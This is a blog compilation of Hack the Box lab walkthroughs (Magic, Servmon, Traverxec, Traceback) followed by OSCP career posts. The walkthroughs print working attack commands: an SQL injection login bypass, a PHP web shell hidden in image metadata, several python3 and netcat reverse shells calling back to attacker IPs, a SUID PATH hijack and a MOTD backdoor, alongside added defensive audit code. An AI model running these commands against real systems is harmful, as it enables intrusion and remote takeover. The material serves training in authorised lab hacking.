Hack the Box — Magic walkthrough

This is my walkthrough for the Hack the Box machine, Magic.

Magic was released on Saturday April 25th, 2020 by TRX and is rated as a medium box.

Magic box information

Recon

I started scanning this box with the normal nmap command I normally use when starting off.
nmap -v -A -sV -O -p- -T4 -oA magic magic.htb
I do all ports so that I don't miss anything. If I still don't find anything initially, then I will go back and use the -sU flag for UDP, in case there is some random UDP service running. In this case, the only two open ports are TCP 22 and 80.

nmap scan

One application I have found that makes my life a bit easier when it comes to penetration testing is xsltproc. It takes the .xml generated by nmap's -oA flag and converts it into a much more readable .html file. I used the following command to generate the .html file:

xsltproc magic.xml -o magic.html

Converting XML output to HTML
Nmap scan results in HTML format

I see that port 80 is open, so I am going to focus on that.
I browse to the website and am presented with a page full of photos. I also ran dirb against the server to make sure I didn't miss anything, and found a few directories that could be useful.

Dirb results

Initial access

Magic’s default page

At the bottom left of the page there is a link to log in. Maybe I can use default credentials to gain access, or possibly bypass the login. I tried common default username and password combinations, and none of them worked. So I tried to bypass the login with a classic SQL injection, entering the same string in both fields:

Username: 'or''='
Password: 'or''='

SQL Injection

After I hit Login, I am greeted with an Image Upload form.
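Why that string works: once it is pasted into a query built by string concatenation, the WHERE clause becomes username=''or''='' AND password=''or''='', and since AND binds tighter than OR the trailing ''='' is always true, so the first row of the table comes back. The following is an added example, not code from the box or the original post; it uses an in-memory SQLite table (constructed here, with a row mirroring the credentials dumped later in this walkthrough) to show the vulnerable query next to the parameterised one that the same input cannot bypass.

```python
import sqlite3

def build_db():
    """Constructed stand-in for the site's login table (not the box's real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO login VALUES (1, 'admin', 'Th3s3usW4sK1ng')")
    return conn

def build_query(username, password):
    """The vulnerable pattern: user input pasted straight into the SQL text."""
    return ("SELECT username FROM login WHERE username='%s' AND password='%s'"
            % (username, password))

def vulnerable_login(conn, username, password):
    """Returns the matched username or None. A quote in the input rewrites the WHERE clause."""
    row = conn.execute(build_query(username, password)).fetchone()
    return row[0] if row else None

def safe_login(conn, username, password):
    """Same lookup with bound parameters: the input is only ever data."""
    row = conn.execute(
        "SELECT username FROM login WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = build_db()
    payload = "'or''='"
    print(build_query(payload, payload))
    print("vulnerable login returns:", vulnerable_login(db, payload, payload))
    print("parameterised login returns:", safe_login(db, payload, payload))
```

The parameterised version still authenticates admin with the real password; it simply refuses to let the input change the statement, which is the whole fix.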

Image Upload form

At first I tried to upload a PHP web shell file, in hopes that I could upload and then browse to it, but unfortunately the webserver restricted uploads to only image files.

Uploads restricted to only image files

I thought maybe I could take a real JPEG, use exiftool to write a PHP command into its metadata, and give it a name that still ends in .jpg so it passes the image check. I have seen this work in the past. I googled "magic.jpg" for something appropriate to upload and used the following command to embed my PHP code in the image's Comment tag:

exiftool -Comment='<?php system($_GET["cmd"]); ?>' magic.jpg

After I ran the above exiftool command I renamed the file to magic.php.jpg, uploaded it, browsed to the image under /images/uploads/ and passed a system command in the cmd parameter:

Command execution

It worked. Now I needed a stable shell, as I quickly found that my uploaded file was being deleted.

I know that newer versions of netcat don't ship with the -e switch, so I checked whether python was installed. python was not, but python3 is.

Python3 location

I used the following to get a shell back to my attacking machine

http://magic.htb/images/uploads/magic.php.jpg?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.11",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
(URL-encode the command if your browser does not do it for you.)

Successful python3 reverse shell

Elevating to user privileges

After gaining a remote shell, I wanted to know what users are on the system so I can figure out how to escalate my privileges. So I looked at the /etc/passwd file and found a user named theseus.

/etc/passwd file

Now that I know the user I am targeting, I started to look for ways to escalate. I started in the website's root directory to see if there are any config files that may be of use to me. There is a .htaccess file, which I inspected, but it was of no use. There is also a db.php5 file, which had some interesting credentials.

db.php5 contents

I tried to use the credentials to log in via SSH and was denied access; it appears that the server requires public-key authentication. I tried to switch user with su theseus, which also did not work. The credentials are in db.php5, which the website uses for its database, so maybe I can dump the database and find some additional credentials. I used mysqldump to do this and looked for credentials.

Mysqldump results

I can see a login table that has credentials in it:
INSERT INTO login VALUES (1,'admin','Th3s3usW4sK1ng');

I decided to upgrade my shell so that I can actually type the password when su prompts for it. I used the following to get an interactive PTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'

I then issue su - theseus and give the password when prompted.

su - theseus

I’ve changed users to theseus, and quickly grab my flag.

Theseus user flag

Escalating to root privileges

I tried at first to see which commands I could execute as root with the sudo -l command, but this account is not allowed to run sudo commands.

sudo -l

G0tmi1k has an excellent blog on Linux privilege escalation. Even though I do this quite frequently, I still find myself pulling up his blog.

I tend to look for interesting files and see if I can use anything to escalate to root:
find / -perm -1000 -type d 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

When I ran find / -perm -u=s -type f 2>/dev/null and sifted through the mass of results, I came across an interesting file. I ran this because I wanted to find SUID files, which run with the permissions of their owner rather than those of the user who started them.

Interesting file

I was able to single this file out because the date on the file didn’t match up with any of the other files and because of the group information.

sysinfo

It appeared that when I ran /bin/sysinfo it was running several other commands and combining their output into one report about the system.

I ran strings against /bin/sysinfo, and my guess was right.

The binary not only runs other system commands, it does so without specifying their full path. So I should be able to take advantage of this by prepending a directory I control to PATH.

So I'll put a python3 reverse shell into a file called fdisk on my attacking box, serve it over HTTP with python -m SimpleHTTPServer 1234, and copy it to the victim with wget http://10.10.14.11:1234/fdisk. After that I'll prepend my directory to the path with export PATH=/home/theseus/asdf:$PATH (note: I created the asdf directory under /home/theseus).

I also need to make the fdisk file executable, which I did with chmod +x fdisk.

Here are the contents of my fdisk file:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.11",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

I ran the sysinfo command and I now have root.
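The mechanism is that a privileged program which runs "fdisk -l" through the shell lets the caller's PATH decide which fdisk that is. The following is an added example, not code from the box or the original post, that reproduces the hijack without root: it creates two constructed directories, each with a stand-in fdisk script, shows which one a bare command name resolves to under an attacker-controlled PATH, and then shows the fix, a privileged program that ignores the caller's PATH and uses a fixed trusted search path (or absolute paths) of its own.

```python
import os
import shutil
import subprocess
import tempfile

def make_tool(directory, name, message):
    """Write a tiny executable shell script standing in for a real binary (constructed)."""
    path = os.path.join(directory, name)
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\necho '%s'\n" % message)
    os.chmod(path, 0o755)
    return path

def resolve(command, search_path):
    """Which file would a bare command name run under this PATH?"""
    return shutil.which(command, path=search_path)

def run_like_sysinfo(search_path):
    """Mimic a SUID binary doing popen("fdisk -l"): the bare name is looked up in PATH."""
    proc = subprocess.run(["fdisk", "-l"], env={"PATH": search_path},
                          capture_output=True, text=True, check=False)
    return proc.stdout.strip()

def demo():
    with tempfile.TemporaryDirectory() as legit, tempfile.TemporaryDirectory() as evil:
        make_tool(legit, "fdisk", "real fdisk output")          # stands in for /sbin/fdisk
        make_tool(evil, "fdisk", "attacker fdisk ran instead")   # stands in for ~/asdf/fdisk
        # What export PATH=/home/theseus/asdf:$PATH achieves: our directory is searched first.
        hijacked = evil + os.pathsep + legit
        return {
            "hijacked_picks_evil": resolve("fdisk", hijacked).startswith(evil),
            "hijacked_output": run_like_sysinfo(hijacked),
            # Fix: the privileged program sets its own trusted PATH (here the legit
            # directory stands in for /usr/sbin:/usr/bin:/sbin:/bin), or execs
            # /sbin/fdisk by absolute path, so the caller's PATH never matters.
            "fixed_output": run_like_sysinfo(legit),
        }

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The same check works as a quick audit: run strings on any SUID binary, and every command name that lacks a leading slash is a candidate for exactly this swap.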

root

Hack the Box — Servmon Walkthrough

This is my walkthrough for the Hack the Box machine Servmon.

Servmon was released Saturday April 11th 2020, by dmw0ng, and is rated as an easy box.

Servmon

Scanning and enumeration

I started off with my normal nmap scan
nmap -v -A -sV -O -T4 -p- -oA servmon servmon.htb

I do all ports so that I don't miss anything. If I still don't find anything initially, then I will go back and use the -sU flag for UDP, in case there is some random UDP service running. I also use the -oA flag so that I can take the XML output and turn it into a nice HTML page that is much easier to read, and can sometimes be helpful when writing reports. I use a tool in Kali called xsltproc that does this for me.

The syntax is xsltproc servmon.xml -o servmon.html

xsltproc html output of my nmap results.

A lot of open ports come back. Most of them are standard Windows ports, but three really stick out: 21, 22 and 80.

I always want to check if there is anonymous access when I see an FTP server. SSH is not that common on Windows boxes, and of course there could be a vulnerable web application on port 80, so those are things I will want to check initially.

I’ll start with the FTP server.

From my scan results I can see that anonymous access is enabled, so I'll go and see what I can find.

There is a directory called Users with two subdirectories, Nathan and Nadine, and each of those user directories has an interesting file.

Servmon FTP Server

I downloaded the two files locally and read their contents. It looks to be some useful information I can use during this attack.

Interesting file contents

After some time reviewing the results from port 22 (SSH), I decide to move on to port 80. It turns out to be running the NVMS-1000 web interface.

NVMS-1000

User access

I do some searching and find that there is a known directory traversal vulnerability, and that a Metasploit module for it is available.

NVMS Metasploit module

Reviewing what I found on the FTP server, I see a note to the user Nathan saying that Nadine left the passwords.txt file on his desktop. Maybe I can grab that file through the directory traversal and use it for access.

It appears to have worked. I'll review the file and see what's in it. Hopefully it's a list of passwords I can log in with, possibly to the NVMS server, or maybe as a user over SSH.

Retrieved passwords.txt file

It is a password list. Nice choice of passwords. Like Sir Mix A Lot, I too like big butts. Oddly enough, so does Nadine, as her credentials worked for the SSH service, which allowed me to retrieve the user flag. One down, one to go.

User Access

Now on to administrator access.

During my initial enumeration after getting user access, I ran netstat -ano to see what services were listening. The "Notes to do.txt" file I downloaded from the FTP server earlier mentioned that NSClient was locked down, so maybe it can only be accessed internally.

netstat -ano

One port really stands out to me, and that's 8443. I have seen this port used for various web-based services in a lot of other penetration tests I have done. So I browse to it and discover that NSClient++ is running on it. I find the login page and try the same password I used for Nadine, but it does not work. So I search the Windows filesystem and find the nsclient.ini file in the C:\Program Files\NSClient++ directory. I also discover that clicking the forgot-password link tells me which command to run to display the current password.

So I run nscp web -- password --display and it shows me the current password.

NSClient++ password

So I try to log in with that password and notice that I am greeted with the same 403 error as before. Interesting. Let's see what's in the nsclient.ini file.

NSClient.ini

It looks like only localhost is allowed to reach the web server. I'll have to set up a port forward through an SSH tunnel to make this happen.

I run the following command to enable this
ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184

Then I try to access the NSClient web server by navigating to
https://127.0.0.1:8443/index.html#/

NSClient++ Access

I do some searching and find there is a privilege escalation for this version of NSClient++. I tried to follow the steps at https://www.exploit-db.com/exploits/46802 but they didn't work for me. While searching I came across documentation on accessing the web server API via curl at https://docs.nsclient.org/api/scripts/

After a LOT of trial and error I got it working with the following commands. Note that I had already uploaded nc.exe to C:\Temp and had a netcat listener on port 1234 on my Kali host.

nadine@SERVMON C:\Program Files\NSClient++>curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/agent.bat --data-binary "C:\Temp\nc.exe 10.10.14.16 1234 -e cmd.exe"
Enter host password for user 'admin':
Added agent as scripts\agent.bat

nadine@SERVMON C:\Program Files\NSClient++>nscp settings --list
L core Duplicate commandfor command: list_file
C:\Program Files\NSClient++/nsclient.log could not be opened, Discarding: info: Duplicate commandfor command: list_file
/modules.CheckDisk=disabled
/modules.CheckEventLog=disabled
/modules.CheckExternalScripts=enabled
/modules.CheckHelpers=disabled
/modules.CheckNSCP=disabled
/modules.CheckSystem=disabled
/modules.CheckTaskSched=enabled
/modules.NRPEServer=enabled
/modules.Scheduler=enabled
/modules.WEBServer=enabled
/settings/NRPE/server.insecure=false
/settings/NRPE/server.ssl options=no-sslv2,no-sslv3
/settings/NRPE/server.verify mode=peer-cert
/settings/default.allowed hosts=127.0.0.1
/settings/default.password=ew2x6SsGTxjRwXOT
/settings/external scripts/scripts/TestingX.TestingX=TestingX
/settings/external scripts/scripts/default.command=cmd /c " echo test > c:\Temp\test.txt"
/settings/external scripts/scripts.agent=scripts\agent.bat
/settings/external scripts/scripts.list_file=c:\Temp\evil.bat
/settings/external scripts/scripts.testing1=scripts\testing1.bat
/settings/external scripts/scripts.testing2=scripts\testing2.bat
/settings/external scripts/wrappings.bat=scripts\%SCRIPT% %ARGS%
/settings/external scripts/wrappings.ps1=cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script "%SCRIPT%" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -
/settings/external scripts/wrappings.vbs=cscript.exe //T:30 //NoLogo scripts\lib\wrapper.vbs %SCRIPT% %ARGS%
/settings/external scripts.allow arguments=true
/settings/scheduler/schedules/default.command=list_file
/settings/scheduler/schedules/default.interval=20
/settings/scheduler/schedules.Command=list_file
/settings/scheduler/schedules.foobar=
/settings/scheduler/schedules.list_file=
/settings/scheduler/schedules.testing1=

nadine@SERVMON C:\Program Files\NSClient++>curl -s -k -u admin https://localhost:8443/api/v1/queries/agent/commands/execute?time=3m
Enter host password for user 'admin':
{"command":"agent","lines":[{"message":"Command agent didn't terminate within the timeout period 60s","perf":{}}],"result":3}
nadine@SERVMON C:\Program Files\NSClient++>

The API reports that agent didn't terminate within the timeout; that is expected, because nc.exe is holding the connection open. On my listener I am finally greeted with my prize.
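The settings dump above is worth reading as a defender too: the 127.0.0.1 restriction is not a control once an attacker has any local account (ssh -L makes them localhost), the API password sits in clear text in nsclient.ini, and with CheckExternalScripts enabled the API will register and run an arbitrary script as the service account. The following is an added example, not code from the box or the original post, that parses the nscp settings --list format (sample lines copied from the output above, plus one line of log noise to show it being skipped) and flags those settings.

```python
# Sample copied from the nscp settings --list output in this walkthrough, with the
# log line kept to show that non-setting output is ignored by the parser.
SAMPLE = """\
L core Duplicate commandfor command: list_file
/modules.CheckExternalScripts=enabled
/modules.WEBServer=enabled
/settings/default.allowed hosts=127.0.0.1
/settings/default.password=ew2x6SsGTxjRwXOT
/settings/external scripts/scripts.agent=scripts\\agent.bat
/settings/external scripts.allow arguments=true
/settings/scheduler/schedules/default.command=list_file
"""

def parse_settings(text):
    """Turn '/path.key=value' lines into a dict; keys may contain spaces."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("/") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key] = value
    return settings

def audit(settings):
    """Return (key, why it matters) for the settings that made this escalation possible."""
    findings = []
    if settings.get("/modules.WEBServer") == "enabled":
        hosts = settings.get("/settings/default.allowed hosts", "")
        if hosts in ("127.0.0.1", "localhost"):
            findings.append(("/settings/default.allowed hosts",
                             "localhost-only is bypassed by any local user or an SSH -L tunnel"))
        if settings.get("/settings/default.password"):
            findings.append(("/settings/default.password",
                             "API password stored in clear text in nsclient.ini"))
    if settings.get("/modules.CheckExternalScripts") == "enabled":
        findings.append(("/modules.CheckExternalScripts",
                         "PUT /api/v1/scripts/ext/... registers a script that runs as the service"))
        if settings.get("/settings/external scripts.allow arguments") == "true":
            findings.append(("/settings/external scripts.allow arguments",
                             "caller-supplied arguments are passed to external scripts"))
    return findings

if __name__ == "__main__":
    for key, why in audit(parse_settings(SAMPLE)):
        print("%-50s %s" % (key, why))
```

On a real engagement the same parser runs over nsclient.ini or the live nscp settings --list output; the fix is to disable CheckExternalScripts where it is not needed, keep the API password out of world-readable files, and treat "allowed hosts=127.0.0.1" as no protection at all against a local user.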

Gaining admin access

VICTORY!

Thanks for reading!

Hack the Box — Traverxec Walkthrough

This is my walkthrough for the Hack The Box machine, Traverxec.

Traverxec was released Saturday, November 16, 2019 by jkr and is rated as one of the easier machines to hack.

I started off with my normal nmap scan
nmap -v -A -sV -O -T4 -p- -oA traverxec traverxec
I do all ports so that I don't miss anything. If I still don't find anything initially, then I will go back and use the -sU flag for UDP, in case there is some random UDP service running. In this case, the only two open ports are TCP 22 and 80.

nmap scan

One application I have found that makes my life a bit easier when it comes to penetration testing is xsltproc. It takes the .xml generated by nmap's -oA flag and converts it into a much more readable .html file. I used the following command to generate the .html file:

xsltproc traverxec_allports.xml -o traverxec_allports.html

xsltproc output
The resulting .html file, which is much more readable and easier on the eyes.

Seeing that port 80 is open, I am going to focus on it. I noticed that the web server is Nostromo version 1.9.6. So first things first: as every good penetration tester does, fire up Google and get searching.

Google Search Results
Google search results come back with a lot of hits for this particular web server.

Initial Access

So as we can see, there are lots of results for the Nostromo 1.9.6 web server. A lot of the results have references to Remote Code Execution (RCE). This is very promising. I’ll take a look in Metasploit to see if there are any exploits for this.

MetaSploit search results
Metasploit has an exploit for Nostromo

I’m in luck! Metasploit has a remote code execution exploit. I’ll set my options and run the exploit.

Metasploit usage

After running the exploit with my options set, I have a shell!

Shell access

After reviewing some typical directories, I find that the Nostromo’s home directory is located in /var/nostromo.
From there I see a conf directory containing .htpasswd and nhttpd.conf files, which hold a password for a protected directory and the web server configuration, respectively. First things first, let's get the password in the .htpasswd file cracked. I used john with the rockyou.txt wordlist, using the following command:

john --wordlist=/usr/share/wordlists/rockyou.txt --pot=cracked.txt .htpasswd

It takes a couple of minutes, but our password is cracked.

John cracking the .htpasswd
Our password is cracked

Now lets take a look at that config file and see what we can learn.

nhttpd.conf
The nostromo config file

After reviewing the config file, along with the documentation for the Nostromo config file, I discover that the last two lines of the config contained within the #HOMEDIRS section is what I am looking for.
I do an ls -al /home and find that there is a directory named david. This directory only gives me execute permissions.
Based on the config file, I am guessing that david is going to have a sub directory named public_www, so let’s see if we can get a directory listing of /home/david/public_www

Directory listing of /home
Listing the contents of the /home/david/public_www directory

So we see we have another directory named protected-file-area.
The Nostromo documentation says that the home directories listed in the config file can be accessed using ~
This means, we should be able to navigate to http://traverxec/~david and see some content.

Content of the ~david directory
Browsing the ~david directory

Success! So now we should be able to browse to the protected-file-area and see if there is anything there which may be useful.
We browse to it and find that it asks for a user name and password. Remember that password we cracked from the .htpasswd file earlier? Typically, .htpasswd files are used to password protect a web directory.

Accessing the protected-file-area

As we can see, we now have access to the protected-file-area.

Gaining user access to David

We have now downloaded the backup-ssh-identity-files.tgz. I am going to assume that based on the name of the file, that this archive contains an ssh key to be used for remote ssh sessions.

I immediately try to ssh into the box with the key extracted from the archive, and I am asked for a pass phrase. I tried the password from earlier, hoping that the user would have the same password used, but no such luck. So let’s see if we can use ssh2john to make the key into a john readable format for cracking.

By default in Kali, ssh2john is located in /usr/share/john/ssh2john.py

I run the following command to generate a file suitable for john:

/usr/share/john/ssh2john.py id_rsa > hash.txt

Converting ssh to john for cracking
Generating our file for John to crack

John cracks our file pretty quickly.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

ssh passphrase cracked
We have successfully cracked the ssh passphrase

So now that we have what we think is the SSH passphrase, let's set the permissions on the key and try to ssh in as david.

chmod 600 id_rsa
ssh -i id_rsa david@traverxec

Gaining access as david

Success! We can see that the user.txt file is found and readable. Now on to root.

Privilege Escalation

In david's home directory is a bin directory, and within it are two files. I cat server-stats.sh and notice that journalctl is being run through sudo. I look it up on GTFOBins and find that journalctl can be used to break out into a shell: it hands its output to the default pager, less, which lets you scroll through the output and also run commands. So let's run it and see if we can do the same.

Running the sudo server-stats.sh command

When running the server-stats.sh script, it isn't behaving as expected. It should let me scroll through the output, but it just runs and returns the output. This is because journalctl only hands its output to the pager when it does not fit in the terminal, and here everything fits on the screen. What happens when I shrink my window and run the script again?

Running the sudo server-stats.sh command

Perfect! Now let's try to escape from the pager and hopefully get a root prompt out of it. I'll do this by typing
!/bin/bash

Gaining root privs
Root access

Success! We can see that we now have a root shell and can see the root.txt flag!

That’s it! I hope you enjoyed this walkthrough, and found it helpful.
Please leave any feedback you may have!

Hack The Box — Traceback

Traceback was released on March 14th, 2020. It is a Linux box that is rated as easy.
I liked this box, as it had me learning more about how Message Of the Day (MOTD) works in Linux. It’s not something I have seen before, but I will certainly look for in my future engagements.

I started with my initial nmap scan

nmap -v -sV -A -O -T4 -p- -oA traceback traceback

I find that only ports 22 and 80 are currently open.

I decided to browse the website on port 80 to see what is being hosted.

It appears that this website has already been hacked and defaced.

The message on the page says that they left a back door, and the person who hacked in previously has graciously left their handle. I decide to check the HTML source; maybe they left something in there, or maybe there is something from the actual server owner. Let's do some searching on this. They may have left some clues, or bragged about how they got in.

I’m going to google the hacker’s name and see if I can find anything that might be a backdoor way into the server.

I find out that the hacker has their own Github, and a directory which contains a lot of different webshells. Maybe the hacker left one of these on the server for future use?

To make my life easier, I put all of the file names into a text file so that I can use dirbuster to check for them on the server. It looks like the hacker is using the smevk.php backdoor.

It looks like the shell requires a username and password.

Looking at the code on GitHub, the default username and password are admin/admin. I'll try that and see if it works.

It works!

I check the /etc/passwd file and see that there are two users, webadmin and sysadmin. Their home directories are under /home.

I'll check what permissions I have in the /home directories.

I only have permissions to my own home directory. So I will see what’s in it.

There's a note.txt that was created by the sysadmin user. I'll check what's in the file.

I have access to Lua somewhere. The sysadmin says I know where to find it. Let me check the .bash_history file, and see if there is anything there that shows me anything.

I see some sudo commands listed in there. Let me see what sudo commands I have available to me.

It looks like I can run a command located in the sysadmin home directory. Could this be the Lua binary I should be looking for? I'll run it with the -h flag and see what the output is.

Great! It is the Lua binary I am looking for. In addition, I can run it as sysadmin. Maybe I can run some Lua code as sysadmin.

It works! Now maybe I can put my local id_rsa.pub contents into the .ssh/authorized_keys

I’ve uploaded my id_rsa.pub into the /tmp folder, and I am going to echo the contents of it into the authorized_keys file. Now I’ll see if I can SSH in.

It worked!

Now to escalate to root.

I noticed that when I connected, a MOTD was presented to me. That tells me the dynamic MOTD scripts are being executed at login, and on Ubuntu pam_motd runs them as root. I'll look through the MOTD files and see which one is giving me the greeting.

It looks like a header to me. So what I’ll try doing now is adding a reverse shell in the /tmp directory named shell.sh. It will contain the following code:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Then I make the file executable and world readable/writable.

After this I echo /tmp/shell.sh into the /etc/update-motd.d/00-header file. I am hoping that when I log in as sysadmin over SSH again, 00-header will run and execute the command I appended to it.

Bingo! I have obtained root privileges.
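The root cause is a script under /etc/update-motd.d that a non-root user could modify; since pam_motd runs everything in that directory as root at every login, a writable script there is a root shell waiting to happen. The following is an added example, not code from the box or the original post, that audits such a directory for scripts an unprivileged user could change (group/world-writable files, a writable directory, symlinks, or a non-root owner). The demo builds a constructed temporary directory with one bad and one correct script, and uses the current uid in place of root because it cannot chown.

```python
import os
import stat
import tempfile

def others_can_write(mode):
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_motd_dir(directory, trusted_uid=0):
    """Return (name, reason) for everything in a MOTD script directory that a
    non-privileged user could influence. Run against /etc/update-motd.d on a real host."""
    findings = []
    if others_can_write(os.stat(directory).st_mode):
        findings.append((".", "directory is group/world writable: anyone can drop a new script"))
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            findings.append((name, "symlink: target may be user-controlled"))
        elif not stat.S_ISREG(st.st_mode):
            continue
        elif others_can_write(st.st_mode):
            findings.append((name, "group/world writable"))
        elif st.st_uid != trusted_uid:
            findings.append((name, "owned by uid %d, not the trusted uid" % st.st_uid))
    return findings

def demo():
    """Constructed directory: 00-header left 0777 as on the box, 10-help-text a correct 0755."""
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, 0o755)
        for name, mode in (("00-header", 0o777), ("10-help-text", 0o755)):
            path = os.path.join(d, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\nprintf 'Welcome\\n'\n")
            os.chmod(path, mode)
        # The demo cannot chown to root, so the current uid stands in for uid 0.
        return audit_motd_dir(d, trusted_uid=os.getuid())

if __name__ == "__main__":
    for name, reason in demo():
        print(name, "->", reason)
```

On a production host, anything this reports is worth treating as a root compromise path; the fix is root ownership with mode 0755 on the scripts and 0755 on the directory, with no symlinks into user-writable locations.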

Thanks for reading!

Life as a pen tester after the PWK / OSCP

This is my personal experience of what happened after passing the OSCP exam.

TL;DR
I passed the OSCP, applied to a bunch of positions, went on a bunch of interviews, and after some time, became a red teamer. I am now a penetration tester with Leidos, and so far, I enjoy it.

Post Exam
I have noticed a lot of people posting blogs after taking the OSCP exam. A lot of them have been pretty good articles about their trials and tribulations in relations to the PWK course and subsequent OSCP exam. It’s great to see many others being successful in the OSCP exam and achieving their certification.

What I have also noticed is that not many people post a whole lot about their experiences after obtaining their OSCP. This article will be about my life post OSCP.

Searching and searching
A little after I passed the OSCP exam I updated my resume and my LinkedIn profile. At that time the OSCP wasn't as well known as it is today. Kudos to Offensive Security for getting their name out there and making more people aware of what they provide: not only training, but also their security services. I had a few recruiters sending me messages about various positions, mostly junior security positions. At that point of my career I already had 20 years of IT experience and a year and a half in security engineering, so I was not looking for a junior position. I knew what I wanted, I was comfortable in my position, and I was willing to wait until I found the position that was right for me.

It took a year before I landed in the right position. During that year I went on countless interviews, including one within my own company (Lockheed Martin). I even landed an interview because of my article on my PWK/OSCP experience. Nothing was what I wanted. In the meantime, while I was searching, I was trying to keep my skills sharp: I started working on more vulnerable machines from VulnHub, reading more security-related articles, and spending more time on /r/netsec.

Great success!
Eventually I found a great position for a government red team. I wasn’t sure I was going to be able to do it, as I hadn’t ever done any penetration testing for a company at that point. I thought to myself, what the hell? The worst that’ll happen is I’ll get the job.

So I applied, and I got a call back the next day from the recruiter. He wanted to talk about salary and tell me a little more about the job. A couple of days after that, I had a technical interview with someone at the company. The screen went very well, and I was able to show them I was passionate about security and knowledgeable about penetration testing. They wanted to bring me in for an on-site penetration test in their lab, but the lab was down. I was happy to do the on-site test if it were available, so instead I told them I would make a screen recording of me attacking a vulnerable machine, including the steps needed to enumerate it. They liked the idea. So I did the task and sent it over to the person I had spoken to. They liked what I had done, and after an in-person interview with the same person and their management, they offered me the position.

I really enjoyed that process because it put me on the spot to perform and provide a deliverable, and in doing so rewarded me with a position on a red team. Not bad for someone who had no penetration testing experience.

I enjoyed my time with that particular red team. I learned a lot and got to do some really cool things. I got paid to hack government computers, and not go to jail! How cool is that?

To infinity and beyond!
Like all good things, everything comes to an end. The missions dried up, and I wasn’t getting any training. I wasn’t really looking for another opportunity, but my current position came up and was presented to me. I decided why not listen to what they had to say? I went to an interview and did well. I was offered the job with more money, and promised training. In addition they’d send me to defcon. After a couple of days of thinking, I decided to take the job. This new position is providing me with different challenges and I am learning. You can’t really beat that. I’m hoping to stay here for a few years, learn some more, and provide a valuable service to my customer.

About me
I have a BS and MS in IT/Cyber security and I have a whole bunch of IT certifications (MCSE, MCSA, RHCSA, VCP, CEH, GCIH, OSWP, OSCP).
I also have over 20 years of IT and security experience, and I am a Navy veteran.
I’m sure that my sheer drive and determination lead me to where I am today. Never stop learning, and always keep pursuing  your goals.

In the immortal words of conner4real: Never stop never stopping.
OSCP Never Stop Never Stopping

CompTIA Security+ CEUs


A quick overview of the CompTIA Security+ CEU program

So today a coworker was working on getting his administrative accounts setup. Part of the process to get the accounts created by our help desk is that you have to have a current, the keyword being current, Security+ certification offered by CompTIA. My coworker was unaware that CompTIA had changed its program which now requires that certification holders complete CEUs in addition to paying a yearly maintenance fee. After looking at his certification he discovered that he would have to take the exam all over again in order to be compliant to receive his administrative accounts. Was he ever mad. He just assumed that since he has one of the good for life certifications that he would be “good to go”.

This got me thinking that I should probably check my account standing since it has been a while since I have submitted any CEUs. So I head on over to CompTIAs website at https://www.certmetrics.com/comptia/default.aspx and of course I discover I have some catching up I need to do. After logging in I find that I can write a blog of no less than 500 words about the Security+ certification and receive one CEU for this action. Score! So here I am writing about this experience, trying to catch up on CEUs, and of my coworkers experience.

For those that also hold the Offensive Security Certified Professional (OSCP) certification, it does not count for CEUs under CompTIA’s program. I have not reached out to EC-Council yet. Hopefully it does so that I can knock those CEUS for the year out of the way as well.

Some other items you can submit CEUS for are as follows:
(Note that this isn’t a complete list)
Write a book
Publish a blog
Publish a white paper/Article
Work experience (once per year)
College courses
Other certifications.

Since I completed my Master’s degree this year, I was able to add the last two courses I took to get me 20 credits toward my 3 year goal of 50 CEUs. Each one of the graduate courses I finished this year gave me 10 CEUs per class.

So now I am almost halfway toward my goal of 50 CEUs. I may have to go and take the CASP exam sometime soon. If you are able to pass an exam of equal or higher difficulty, it gives you the maximum number of CEUs. This means that if you have Security+ and pass the CASP exam, you would be all caught up on CEUs for Security+. However, you would still have to do the CEUs required for the CASP exam, which I believe is a lot more.

The point of this program is to ensure certification holders are staying up to date on security and are staying aware of the latest types of attacks and ways to mitigate those attacks. I do wish that CompTIA would be more accepting of other certifications (like the OSCP) so that the time I spent on that course and exam would also give me CEUs for my other certifications such as Security+ and CEH.


Try Harder! My Penetration Testing with Kali Linux OSCP Review and course/lab experience

Introduction:
Obtaining the OSCP certification is a challenge like no other. After my experience with the OSCP exam and course from Offensive Security, I decided to go ahead and write an OSCP review. I decided to take the OSCP course and exam in September 2014 after seeing some fellow members of a forum I frequent quite a bit (www.techexams.net) state that they were taking it soon. This is a course and exam I wanted to tackle, as I have a passion for IT security. I figured, why not sign up at the same time, compare notes, etc. with like-minded people, and make the process easier.

So I signed up for the 90 days, and a week later I was sent the introduction email with all the information I needed: VPN details to connect to the Offensive Security labs, IRC information, login information, and forum information.
